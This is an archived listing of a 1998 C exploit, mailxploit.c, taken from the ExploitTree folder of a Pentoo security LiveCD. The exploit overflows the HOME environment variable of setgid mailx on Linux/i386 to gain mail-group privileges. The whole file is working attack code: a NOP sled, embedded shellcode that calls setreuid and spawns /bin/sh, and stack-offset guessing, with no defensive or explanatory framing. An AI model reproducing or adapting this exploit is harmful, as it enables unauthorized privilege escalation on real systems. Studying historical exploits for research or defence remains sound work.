home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / linux-mailx.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  73 lines
  1. /*
  2.  * mailxploit.c (Linux/i386)
  3.  * Sat Jun 20 00:47:59 CEST 1998
  4.  * Alvaro Martinez Echevarria <elguru@lander.es>
  5.  * Exploit a buffer overrun in mailx using the environment variable
  6.  * $HOME, to acquire "mail" group privileges (assuming that mailx
  7.  * is installed setgid mail).
  8.  */
  9.  
  10. #include <stdio.h>
  11. #include <stdlib.h>
  12. #include <unistd.h>
  13. #include <string.h>
  14.  
  15. /*
  16.  * The location of mailx.
  17.  */
  18. #define MAILX  "/usr/bin/mail"
  19. /*
  20.  * The gid for group mail (represented in a char, in hexadecimal).
  21.  */
  22. #define GID    "\x08"
  23.  
  24. #define DEFAULT_OFFSET                 2000
  25. #define DEFAULT_BUFFER_SIZE            1124
  26. #define NOP                            0x90
  27.  
  28. char shellcode[] =
  29.   /* seteuid(GID); setreuid(GID,GID); */
  30.   "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1" GID "\x31\xc0\xb0\x47\xcd\x80"
  31.   "\x31\xdb\x31\xc9\xb3" GID "\xb1" GID "\x31\xc0\xb0\x47\xcd\x80"
  32.   /* generic shell code by Aleph One */
  33.   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  34.   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  35.   "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  36.  
  37. unsigned long
  38. get_sp(void) {
  39.    __asm__("movl %esp,%eax");
  40. }
  41.  
  42. int
  43. main(int argc, char *argv[]) {
  44.   char *buff, *ptr;
  45.   long *addr_ptr, addr;
  46.   int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  47.   int i;
  48.  
  49.   addr = get_sp() - offset;
  50.   if ((buff=(char *)malloc(bsize))==NULL) {
  51.     fprintf(stderr,"error in malloc()\n");
  52.     exit(1);
  53.   }
  54.  
  55.   ptr = buff;
  56.   addr_ptr = (long *) ptr;
  57.   for (i = 0; i < bsize; i+=4)
  58.     *(addr_ptr++) = addr;
  59.   for (i = 0; i < bsize/2; i++)
  60.     buff[i] = NOP;
  61.   ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  62.   for (i = 0; i < strlen(shellcode); i++)
  63.     *(ptr++) = shellcode[i];
  64.   buff[bsize - 1] = '\0';
  65.  
  66.   setenv("HOME",buff,1);
  67.   execl(MAILX,MAILX,"-n","-f","~/patata",NULL);
  68.  
  69.   exit(0);
  70.  
  71. }
  72.  
  73.